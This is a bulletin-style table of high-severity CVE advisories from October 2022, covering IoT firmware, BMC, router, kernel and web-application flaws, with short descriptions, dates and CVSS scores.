goabode — iota_all-in-one_security_kit_firmware	A format string injection vulnerability exists in the ghome_process_control_packet functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9Z and 6.9X. A specially-crafted XCMD can lead to memory corruption, information disclosure and denial of service. An attacker can send a malicious XML payload to trigger this vulnerability.	2022-10-25	9.8	CVE-2022-33938 MISC
goabode — iota_all-in-one_security_kit_firmware	A format string injection vulnerability exists in the XCMD getVarHA functionality of abode systems, inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted XCMD can lead to memory corruption, information disclosure, and denial of service. An attacker can send a malicious XML payload to trigger this vulnerability.	2022-10-25	9.8	CVE-2022-35244 MISC
goabode — iota_all-in-one_security_kit_firmware	Four format string injection vulnerabilities exist in the XCMD testWifiAP functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. Specially-crafted configuration values can lead to memory corruption, information disclosure and denial of service. An attacker can modify a configuration value and then execute an XCMD to trigger these vulnerabilities.This vulnerability arises from format string injection via the `ssid` and `ssid_hex` configuration parameters, as used within the `testWifiAP` XCMD handler	2022-10-25	9.8	CVE-2022-35874 MISC
goabode — iota_all-in-one_security_kit_firmware	Four format string injection vulnerabilities exist in the XCMD testWifiAP functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. Specially-crafted configuration values can lead to memory corruption, information disclosure and denial of service. An attacker can modify a configuration value and then execute an XCMD to trigger these vulnerabilities.This vulnerability arises from format string injection via the `wpapsk` configuration parameter, as used within the `testWifiAP` XCMD handler	2022-10-25	9.8	CVE-2022-35875 MISC
goabode — iota_all-in-one_security_kit_firmware	Four format string injection vulnerabilities exist in the XCMD testWifiAP functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. Specially-crafted configuration values can lead to memory corruption, information disclosure and denial of service. An attacker can modify a configuration value and then execute an XCMD to trigger these vulnerabilities.This vulnerability arises from format string injection via the `default_key_id` and `key` configuration parameters, as used within the `testWifiAP` XCMD handler	2022-10-25	9.8	CVE-2022-35876 MISC
goabode — iota_all-in-one_security_kit_firmware	Four format string injection vulnerabilities exist in the XCMD testWifiAP functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. Specially-crafted configuration values can lead to memory corruption, information disclosure and denial of service. An attacker can modify a configuration value and then execute an XCMD to trigger these vulnerabilities.This vulnerability arises from format string injection via the `default_key_id` configuration parameter, as used within the `testWifiAP` XCMD handler	2022-10-25	9.8	CVE-2022-35877 MISC
goabode — iota_all-in-one_security_kit_firmware	An OS command injection vulnerability exists in the web interface /action/iperf functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.	2022-10-25	8.8	CVE-2022-30603 MISC
goabode — iota_all-in-one_security_kit_firmware	An OS command injection vulnerability exists in the web interface /action/ipcamRecordPost functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.	2022-10-25	8.8	CVE-2022-32586 MISC
goabode — iota_all-in-one_security_kit_firmware	An integer overflow vulnerability exists in the web interface /action/ipcamRecordPost functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted HTTP request can lead to memory corruption. An attacker can make an authenticated HTTP request to trigger this vulnerability.	2022-10-25	8.8	CVE-2022-32775 MISC
goabode — iota_all-in-one_security_kit_firmware	Four format string injection vulnerabilities exist in the UPnP logging functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9Z and 6.9X. A specially-crafted UPnP negotiation can lead to memory corruption, information disclosure, and denial of service. An attacker can host a malicious UPnP service to trigger these vulnerabilities.This vulnerability arises from format string injection via `ST` and `Location` HTTP response headers, as used within the `DoEnumUPnPService` action handler.	2022-10-25	8.8	CVE-2022-35878 MISC
goabode — iota_all-in-one_security_kit_firmware	Four format string injection vulnerabilities exist in the UPnP logging functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9Z and 6.9X. A specially-crafted UPnP negotiation can lead to memory corruption, information disclosure, and denial of service. An attacker can host a malicious UPnP service to trigger these vulnerabilities.This vulnerability arises from format string injection via `controlURL` XML tag, as used within the `DoUpdateUPnPbyService` action handler.	2022-10-25	8.8	CVE-2022-35879 MISC
goabode — iota_all-in-one_security_kit_firmware	Four format string injection vulnerabilities exist in the UPnP logging functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9Z and 6.9X. A specially-crafted UPnP negotiation can lead to memory corruption, information disclosure, and denial of service. An attacker can host a malicious UPnP service to trigger these vulnerabilities.This vulnerability arises from format string injection via `NewInternalClient` XML tag, as used within the `DoUpdateUPnPbyService` action handler.	2022-10-25	8.8	CVE-2022-35880 MISC
goabode — iota_all-in-one_security_kit_firmware	Four format string injection vulnerabilities exist in the UPnP logging functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9Z and 6.9X. A specially-crafted UPnP negotiation can lead to memory corruption, information disclosure, and denial of service. An attacker can host a malicious UPnP service to trigger these vulnerabilities.This vulnerability arises from format string injection via `errorCode` and `errorDescription` XML tags, as used within the `DoUpdateUPnPbyService` action handler.	2022-10-25	8.8	CVE-2022-35881 MISC
goabode — iota_all-in-one_security_kit_firmware	Four format string injection vulnerabilities exist in the web interface /action/wirelessConnect functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9Z and 6.9X. A specially-crafted HTTP request can lead to memory corruption, information disclosure and denial of service. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.This vulnerability arises from format string injection via the `ssid_hex` HTTP parameter, as used within the `/action/wirelessConnect` handler.	2022-10-25	8.8	CVE-2022-35884 MISC
goabode — iota_all-in-one_security_kit_firmware	Four format string injection vulnerabilities exist in the web interface /action/wirelessConnect functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9Z and 6.9X. A specially-crafted HTTP request can lead to memory corruption, information disclosure and denial of service. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.This vulnerability arises from format string injection via the `wpapsk_hex` HTTP parameter, as used within the `/action/wirelessConnect` handler.	2022-10-25	8.8	CVE-2022-35885 MISC
goabode — iota_all-in-one_security_kit_firmware	Four format string injection vulnerabilities exist in the web interface /action/wirelessConnect functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9Z and 6.9X. A specially-crafted HTTP request can lead to memory corruption, information disclosure and denial of service. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.This vulnerability arises from format string injection via the `default_key_id` and `key` HTTP parameters, as used within the `/action/wirelessConnect` handler.	2022-10-25	8.8	CVE-2022-35886 MISC
goabode — iota_all-in-one_security_kit_firmware	Four format string injection vulnerabilities exist in the web interface /action/wirelessConnect functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9Z and 6.9X. A specially-crafted HTTP request can lead to memory corruption, information disclosure and denial of service. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.This vulnerability arises from format string injection via the `default_key_id` HTTP parameter, as used within the `/action/wirelessConnect` handler.	2022-10-25	8.8	CVE-2022-35887 MISC
goabode — iota_all-in-one_security_kit_firmware	An information disclosure vulnerability exists in the XFINDER functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted man-in-the-middle attack can lead to increased privileges. An attacker can perform a man-in-the-middle attack to trigger this vulnerability.	2022-10-25	8.1	CVE-2022-29475 MISC
goabode — iota_all-in-one_security_kit_firmware	A denial of service vulnerability exists in the XCMD doDebug functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted XCMD can lead to denial of service. An attacker can send a malicious XML payload to trigger this vulnerability.	2022-10-25	7.5	CVE-2022-32760 MISC
gradle — enterprise	A credential-exposure vulnerability in the support-bundle mechanism in Gradle Enterprise 2022.3 through 2022.3.3 allows remote attackers to access a subset of application data (e.g., cleartext credentials). This is fixed in 2022.3.3.	2022-10-21	7.5	CVE-2022-41575 MISC MISC
hospital_management_system_project — hospital_management_system	Hospital Management System v 4.0 is vulnerable to SQL Injection via file:hospital/hms/admin/view-patient.php.	2022-10-28	8.8	CVE-2021-35387 MISC MISC
iij — iij_smartkey	Information disclosure vulnerability in Android App ‘IIJ SmartKey’ versions prior to 2.1.4 allows an attacker to obtain a one-time password issued by the product under certain conditions.	2022-10-24	7.5	CVE-2022-41986 MISC MISC
jflyfox — jfinal_cms	JFinal CMS 5.1.0 is vulnerable to SQL Injection via /admin/advicefeedback/list	2022-10-26	8.8	CVE-2022-37202 MISC MISC
jupyter — jupyter_core	Jupyter Core is a package for the core common functionality of Jupyter projects. Jupyter Core prior to version 4.11.2 contains an arbitrary code execution vulnerability in `jupyter_core` that stems from `jupyter_core` executing untrusted files in CWD. This vulnerability allows one user to run code as another. Version 4.11.2 contains a patch for this issue. There are no known workarounds.	2022-10-26	8.8	CVE-2022-39286 MISC CONFIRM
kadencewp — kadence_woocommerce_email_designer	The Kadence WooCommerce Email Designer WordPress plugin before 1.5.7 unserialises the content of an imported file, which could lead to PHP object injections issues when an admin import (intentionally or not) a malicious file and a suitable gadget chain is present on the blog.	2022-10-25	7.2	CVE-2022-3335 CONFIRM
kartverket — github-workflows	kartverket/github-workflows are shared reusable workflows for GitHub Actions. Prior to version 2.7.5, all users of the `run-terraform` reusable workflow from the kartverket/github-workflows repo are affected by a code injection vulnerability. A malicious actor could potentially send a PR with a malicious payload leading to execution of arbitrary JavaScript code in the context of the workflow. Users should upgrade to at least version 2.7.5 to resolve the issue. As a workaround, review any pull requests from external users for malicious payloads before allowing them to trigger a build.	2022-10-25	8.8	CVE-2022-39326 CONFIRM MISC MISC
keystonejs — keystone	@keystone-6/core is a core package for Keystone 6, a content management system for Node.js. Starting with version 2.2.0 and prior to version 2.3.1, users who expected their `multiselect` fields to use the field-level access control – if configured – are vulnerable to their field-level access control not being used. List-level access control is not affected. Field-level access control for fields other than `multiselect` are not affected. Version 2.3.1 contains a fix for this issue. As a workaround, stop using the `multiselect` field.	2022-10-25	9.8	CVE-2022-39322 CONFIRM MISC
lannerinc — iac-ast2500_firmware	Use of hard-coded TLS certificate by default allows an attacker to perform Man-in-the-Middle (MitM) attacks even in the presence of the HTTPS connection. This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.00.0.	2022-10-24	8.1	CVE-2021-4228 MISC
lannerinc — iac-ast2500a_firmware	Multiple command injections and stack-based buffer overflows vulnerabilities in the SubNet_handler_func function of spx_restservice allow an attacker to execute arbitrary code with the same privileges as the server user (root). This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0.	2022-10-24	9.8	CVE-2021-26727 MISC MISC
lannerinc — iac-ast2500a_firmware	Command injection and stack-based buffer overflow vulnerabilities in the KillDupUsr_func function of spx_restservice allow an attacker to execute arbitrary code with the same privileges as the server user (root). This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0.	2022-10-24	9.8	CVE-2021-26728 MISC MISC
lannerinc — iac-ast2500a_firmware	Command injection and multiple stack-based buffer overflows vulnerabilities in the Login_handler_func function of spx_restservice allow an attacker to execute arbitrary code with the same privileges as the server user (root). This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0.	2022-10-24	9.8	CVE-2021-26729 MISC MISC
lannerinc — iac-ast2500a_firmware	A stack-based buffer overflow vulnerability in a subfunction of the Login_handler_func function of spx_restservice allows an attacker to execute arbitrary code with the same privileges as the server user (root). This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0.	2022-10-24	9.8	CVE-2021-26730 MISC MISC
lannerinc — iac-ast2500a_firmware	Command injection and multiple stack-based buffer overflows vulnerabilities in the modifyUserb_func function of spx_restservice allow an attacker to execute arbitrary code with the same privileges as the server user (root). This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0.	2022-10-24	9.8	CVE-2021-26731 MISC MISC
lannerinc — iac-ast2500a_firmware	Session fixation and insufficient session expiration vulnerabilities allow an attacker to perfom session hijacking attacks against users. This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0.	2022-10-24	9.8	CVE-2021-46279 MISC MISC
lannerinc — iac-ast2500a_firmware	A broken access control vulnerability in the FirstReset_handler_func function of spx_restservice allows an attacker to arbitrarily send reboot commands to the BMC, causing a Denial-of-Service (DoS) condition. This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0.	2022-10-24	7.5	CVE-2021-26733 MISC MISC
lannerinc — iac-ast2500a_firmware	A broken access control vulnerability in the KillDupUsr_func function of spx_restservice allows an attacker to arbitrarily terminate active sessions of other users, causing a Denial-of-Service (DoS) condition. This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0.	2022-10-24	7.5	CVE-2021-44467 MISC MISC
lannerinc — iac-ast2500a_firmware	An improper input validation vulnerability in the TLS certificate generation function allows an attacker to cause a Denial-of-Service (DoS) condition which can only be reverted via a factory reset. This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0.	2022-10-24	7.5	CVE-2021-44769 MISC MISC
libexpat_project — libexpat	In libexpat through 2.4.9, there is a use-after free caused by overeager destruction of a shared DTD in XML_ExternalEntityParserCreate in out-of-memory situations.	2022-10-24	7.5	CVE-2022-43680 MISC MISC MISC MLIST DEBIAN
linux — linux_kernel	A vulnerability was found in Linux Kernel. It has been classified as problematic. Affected is the function nilfs_new_inode of the file fs/nilfs2/inode.c of the component BPF. The manipulation leads to use after free. It is possible to launch the attack remotely. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211992.	2022-10-21	9.8	CVE-2022-3649 N/A N/A
linux — linux_kernel	A vulnerability, which was classified as critical, was found in Linux Kernel. Affected is the function l2cap_conn_del of the file net/bluetooth/l2cap_core.c of the component Bluetooth. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211944.	2022-10-21	8.8	CVE-2022-3640 MISC MISC
linux — linux_kernel	A vulnerability was found in Linux Kernel. It has been classified as critical. This affects the function devlink_param_set/devlink_param_get of the file net/core/devlink.c of the component IPsec. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier VDB-211929 was assigned to this vulnerability.	2022-10-21	7.8	CVE-2022-3625 N/A N/A
linux — linux_kernel	A vulnerability, which was classified as critical, was found in Linux Kernel. This affects the function __mtk_ppe_check_skb of the file drivers/net/ethernet/mediatek/mtk_ppe.c of the component Ethernet Handler. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211935.	2022-10-21	7.8	CVE-2022-3636 N/A N/A
linux — linux_kernel	drivers/usb/mon/mon_bin.c in usbmon in the Linux kernel before 5.19.15 and 6.x before 6.0.1 allows a user-space client to corrupt the monitor’s internal memory.	2022-10-26	7.8	CVE-2022-43750 MISC MISC MISC MISC
linux — linux_kernel	A vulnerability, which was classified as critical, has been found in Linux Kernel. Affected by this issue is the function tst_timer of the file drivers/atm/idt77252.c of the component IPsec. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. VDB-211934 is the identifier assigned to this vulnerability.	2022-10-21	7	CVE-2022-3635 N/A N/A
litespeedtech — openlitespeed	Improper Input Validation vulnerability in LiteSpeed Technologies OpenLiteSpeed Web Server Dashboard allows Command Injection. This affects 1.7.0 versions before 1.7.16.1.	2022-10-27	8.8	CVE-2022-0073 MISC MISC
litespeedtech — openlitespeed	Untrusted Search Path vulnerability in LiteSpeed Technologies OpenLiteSpeed Web Server Container allows Privilege Escalation. This affects versions from 1.6.15 before 1.7.16.1.	2022-10-27	8.8	CVE-2022-0074 MISC
metabase — metabase	Metabase is data visualization software. Prior to versions 0.44.5, 1.44.5, 0.43.7, 1.43.7, 0.42.6, 1.42.6, 0.41.9, and 1.41.9, H2 (Sample Database) could allow Remote Code Execution (RCE), which can be abused by users able to write SQL queries on H2 databases. This issue is patched in versions 0.44.5, 1.44.5, 0.43.7, 1.43.7, 0.42.6, 1.42.6, 0.41.9, and 1.41.9. Metabase no longer allows DDL statements in H2 native queries.	2022-10-26	8.8	CVE-2022-39361 CONFIRM
metabase — metabase	Metabase is data visualization software. Prior to versions 0.44.5, 1.44.5, 0.43.7, 1.43.7, 0.42.6, 1.42.6, 0.41.9, and 1.41.9, unsaved SQL queries are auto-executed, which could pose a possible attack vector. This issue is patched in versions 0.44.5, 1.44.5, 0.43.7, 1.43.7, 0.42.6, 1.42.6, 0.41.9, and 1.41.9. Metabase no longer automatically executes ad-hoc native queries. Now the native editor shows the query and gives the user the option to manually run the query if they want.	2022-10-26	8.8	CVE-2022-39362 MISC CONFIRM
microsoft — azure_command-line_interface	Azure CLI is the command-line interface for Microsoft Azure. In versions previous to 2.40.0, Azure CLI contains a vulnerability for potential code injection. Critical scenarios are where a hosting machine runs an Azure CLI command where parameter values have been provided by an external source. The vulnerability is only applicable when the Azure CLI command is run on a Windows machine and with any version of PowerShell and when the parameter value contains the `&` or `\|` symbols. If any of these prerequisites are not met, this vulnerability is not applicable. Users should upgrade to version 2.40.0 or greater to receive a a mitigation for the vulnerability.	2022-10-25	9.8	CVE-2022-39327 CONFIRM MISC MISC
mitel — micollab	A vulnerability in the MiCollab Client server component of Mitel MiCollab through 9.5.0.101 could allow an authenticated attacker to conduct a Server-Side Request Forgery (SSRF) attack due to insufficient restriction of URL parameters. A successful exploit could allow an attacker to leverage connections and permissions available to the host server.	2022-10-25	8.8	CVE-2022-36451 MISC MISC
mitel — micollab	A vulnerability in the MiCollab Client API of Mitel MiCollab 9.1.3 through 9.5.0.101 could allow an authenticated attacker to modify their profile parameters due to improper authorization controls. A successful exploit could allow the authenticated attacker to control another extension number.	2022-10-25	8.8	CVE-2022-36453 MISC MISC
octopus — octopus_server	In affected versions of Octopus Server it is possible for a session token to be valid indefinitely due to improper validation of the session token parameters.	2022-10-27	9.1	CVE-2022-2782 MISC
online_medicine_ordering_system_project — online_medicine_ordering_system	A vulnerability classified as critical has been found in SourceCodester Online Medicine Ordering System 1.0. Affected is an unknown function of the file admin/?page=orders/view_order. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. VDB-212346 is the identifier assigned to this vulnerability.	2022-10-27	9.8	CVE-2022-3714 MISC
online_pet_shop_we_app_project — online_pet_shop_we_app	Online Pet Shop We App v1.0 was discovered to contain an arbitrary file upload vulnerability via the Editing function in the User module. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file uploaded through the picture upload point.	2022-10-27	7.2	CVE-2022-39977 MISC
online_pet_shop_we_app_project — online_pet_shop_we_app	Online Pet Shop We App v1.0 was discovered to contain an arbitrary file upload vulnerability via the Editing function in the Product List module. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file uploaded through the picture upload point.	2022-10-27	7.2	CVE-2022-39978 MISC
open-xchange — ox_app_suite	documentconverter in OX App Suite through 7.10.6, in a non-default configuration with ghostscript, allows OS Command Injection because file conversion may occur for an EPS document that is disguised as a PDF document.	2022-10-25	9.8	CVE-2022-29851 MISC
openfga — openfga	OpenFGA is an authorization/permission engine. Versions prior to version 0.2.4 are vulnerable to authorization bypass under certain conditions. Users who have wildcard (`*`) defined on tupleset relations in their authorization model are vulnerable. Version 0.2.4 contains a patch for this issue.	2022-10-25	9.8	CVE-2022-39341 CONFIRM MISC MISC
openfga — openfga	OpenFGA is an authorization/permission engine. Versions prior to version 0.2.4 are vulnerable to authorization bypass under certain conditions. Users whose model has a relation defined as a tupleset (the right hand side of a â€˜fromâ€™ statement) that involves anything other than a direct relationship (e.g. â€˜as selfâ€™) are vulnerable. Version 0.2.4 contains a patch for this issue.	2022-10-25	9.8	CVE-2022-39342 CONFIRM MISC MISC
opensuse — factory	A Improper Link Resolution Before File Access (‘Link Following’) vulnerability in a script called by the sendmail systemd service of openSUSE Factory allows local attackers to escalate from user mail to root. This issue affects: SUSE openSUSE Factory sendmail versions prior to 8.17.1-1.1.	2022-10-26	7.8	CVE-2022-31256 CONFIRM
oxilab — accordions	Auth. WordPress Options Change (siteurl, users_can_register, default_role, admin_email and new_admin_email) vulnerability in Biplob Adhikari’s Accordions – Multiple Accordions or FAQs Builder plugin (versions <= 2.0.3 on WordPress.	2022-10-21	7.2	CVE-2022-38104 CONFIRM CONFIRM
parseplatform — parse-server	Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Versions prior to 4.10.17, and prior to 5.2.8 on the 5.x branch, crash when a file download request is received with an invalid byte range, resulting in a Denial of Service. This issue has been patched in versions 4.10.17, and 5.2.8. There are no known workarounds.	2022-10-24	7.5	CVE-2022-39313 CONFIRM
pikepdf_project — pikepdf	pikepdf before 2.10.0 allows an XXE attack against PDF XMP metadata parsing.	2022-10-24	9.8	CVE-2021-46849 MISC MISC
redis — redis	A vulnerability, which was classified as problematic, was found in Redis. Affected is the function sigsegvHandler of the file debug.c of the component Crash Report. The manipulation leads to denial of service. The name of the patch is 0bf90d944313919eb8e63d3588bf63a367f020a3. It is recommended to apply a patch to fix this issue. VDB-211962 is the identifier assigned to this vulnerability.	2022-10-21	7.5	CVE-2022-3647 N/A N/A
robustel — r1510_firmware	An OS command injection vulnerability exists in the sysupgrade command injection functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger this vulnerability.	2022-10-25	9.8	CVE-2022-32765 MISC
robustel — r1510_firmware	An OS command injection vulnerability exists in the js_package install functionality of Robustel R1510 3.1.16. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger this vulnerability.	2022-10-25	9.8	CVE-2022-33150 MISC
robustel — r1510_firmware	A directory traversal vulnerability exists in the web_server /ajax/remove/ functionality of Robustel R1510 3.1.16. A specially-crafted network request can lead to arbitrary file deletion. An attacker can send a sequence of requests to trigger this vulnerability.	2022-10-25	9.1	CVE-2022-33897 MISC
robustel — r1510_firmware	A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.The `/action/import_authorized_keys/` API is affected by command injection vulnerability.	2022-10-25	7.5	CVE-2022-35261 MISC
robustel — r1510_firmware	A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.The `/action/import_xml_file/` API is affected by command injection vulnerability.	2022-10-25	7.5	CVE-2022-35262 MISC
robustel — r1510_firmware	A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.The `/action/import_file/` API is affected by command injection vulnerability.	2022-10-25	7.5	CVE-2022-35263 MISC
robustel — r1510_firmware	A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.The `/action/import_aaa_cert_file/` API is affected by command injection vulnerability.	2022-10-25	7.5	CVE-2022-35264 MISC
robustel — r1510_firmware	A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.The `/action/import_nodejs_app/` API is affected by command injection vulnerability.	2022-10-25	7.5	CVE-2022-35265 MISC
robustel — r1510_firmware	A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.The `/action/import_firmware/` API is affected by command injection vulnerability.	2022-10-25	7.5	CVE-2022-35266 MISC
robustel — r1510_firmware	A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.The `/action/import_https_cert_file/` API is affected by command injection vulnerability.	2022-10-25	7.5	CVE-2022-35267 MISC
robustel — r1510_firmware	A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.The `/action/import_sdk_file/` API is affected by command injection vulnerability.	2022-10-25	7.5	CVE-2022-35268 MISC
robustel — r1510_firmware	A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.The `/action/import_e2c_json_file/` API is affected by command injection vulnerability.	2022-10-25	7.5	CVE-2022-35269 MISC
robustel — r1510_firmware	A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.The `/action/import_wireguard_cert_file/` API is affected by command injection vulnerability.	2022-10-25	7.5	CVE-2022-35270 MISC
robustel — r1510_firmware	A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.The `/action/import_cert_file/` API is affected by command injection vulnerability.	2022-10-25	7.5	CVE-2022-35271 MISC
robustel — r1510_firmware	An OS command injection vulnerability exists in the web_server /action/import_authorized_keys/ functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger this vulnerability.	2022-10-25	7.2	CVE-2022-34850 MISC
sanitization_management_system_project — sanitization_management_system	A vulnerability has been found in SourceCodester Sanitization Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality. The manipulation leads to missing authentication. The attack can be launched remotely. The identifier VDB-212017 was assigned to this vulnerability.	2022-10-26	9.8	CVE-2022-3674 N/A
school_activity_updates_with_sms_notification_project — school_activity_updates_with_sms_notification	School Activity Updates with SMS Notification v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /modules/announcement/index.php?view=edit&id=.	2022-10-27	9.8	CVE-2022-39976 MISC
sem-cms — semcms	SEMCMS v 1.2 is vulnerable to SQL Injection via SEMCMS_User.php.	2022-10-28	9.8	CVE-2021-38217 MISC
sem-cms — semcms	SEMCMS SHOP v 1.1 is vulnerable to SQL Injection via Ant_Plist.php.	2022-10-28	9.8	CVE-2021-38729 MISC MISC
sem-cms — semcms	SEMCMS SHOP v 1.1 is vulnerable to SQL Injection via Ant_Info.php.	2022-10-28	9.8	CVE-2021-38730 MISC MISC
sem-cms — semcms	SEMCMS SHOP v 1.1 is vulnerable to SQL Injection via Ant_Zekou.php.	2022-10-28	9.8	CVE-2021-38731 MISC MISC
sem-cms — semcms	SEMCMS SHOP v 1.1 is vulnerable to SQL via Ant_Message.php.	2022-10-28	9.8	CVE-2021-38732 MISC MISC
sem-cms — semcms	SEMCMS SHOP v 1.1 is vulnerable to SQL Injection via Ant_BlogCat.php.	2022-10-28	9.8	CVE-2021-38733 MISC MISC
sem-cms — semcms	SEMCMS SHOP v 1.1 is vulnerable to SQL Injection via Ant_Menu.php.	2022-10-28	9.8	CVE-2021-38734 MISC MISC
sem-cms — semcms	SEMCMS Shop V 1.1 is vulnerable to SQL Injection via Ant_Global.php.	2022-10-28	9.8	CVE-2021-38736 MISC MISC
sem-cms — semcms	SEMCMS v 1.1 is vulnerable to SQL Injection via Ant_Pro.php.	2022-10-28	9.8	CVE-2021-38737 MISC MISC
shescape_project — shescape	The package shescape from 1.5.10 and before 1.6.1 are vulnerable to Regular Expression Denial of Service (ReDoS) via the escape function in index.js, due to the usage of insecure regex in the escapeArgBash function.	2022-10-27	7.5	CVE-2022-25918 MISC MISC MISC MISC
siemens — siveillance_video_mobile_server	A vulnerability has been identified in Siveillance Video Mobile Server V2022 R2 (All versions < V22.2a (80)). The mobile server component of affected applications improperly handles the log in for Active Directory accounts that are part of Administrators group. This could allow an unauthenticated remote attacker to access the application without a valid account.	2022-10-21	9.8	CVE-2022-43400 MISC
simple_cold_storage_management_system_project — simple_cold_storage_managment_system	Simple Cold Storage Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /bookings/update_status.php.	2022-10-28	7.2	CVE-2022-43229 MISC
simple_cold_storage_management_system_project — simple_cold_storage_managment_system	Simple Cold Storage Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/?page=bookings/view_details.	2022-10-28	7.2	CVE-2022-43230 MISC
socket — socket.io-parser	Due to improper type validation in attachment parsing the Socket.io js library, it is possible to overwrite the _placeholder object which allows an attacker to place references to functions at arbitrary places in the resulting query object.	2022-10-26	9.8	CVE-2022-2421 CONFIRM CONFIRM
soflyy — wp_all_export	The WP All Export Pro WordPress plugin before 1.7.9 uses the contents of the cc_sql POST parameter directly as a database query, allowing users which has been given permission to run exports to execute arbitrary SQL statements, leading to a SQL Injection vulnerability. By default only users with the Administrator role can perform exports, but this can be delegated to lower privileged users as well.	2022-10-25	8.8	CVE-2022-3395 CONFIRM
soflyy — wp_all_export	The WP All Export Pro WordPress plugin before 1.7.9 does not limit some functionality during exports only to users with the Administrator role, allowing any logged in user which has been given privileges to perform exports to execute arbitrary code on the site. By default only administrators can run exports, but the privilege can be delegated to lower privileged users.	2022-10-25	7.2	CVE-2022-3394 CONFIRM
softmotions — iowow	IOWOW is a C utility library and persistent key/value storage engine. Versions 1.4.15 and prior contain a stack buffer overflow vulnerability that allows for Denial of Service (DOS) when it parses scientific notation numbers present in JSON. A patch for this issue is available at commit a79d31e4cff1d5a08f665574b29fd885897a28fd in the `master` branch of the repository. There are no workarounds other than applying the patch.	2022-10-21	7.5	CVE-2022-23462 CONFIRM MISC
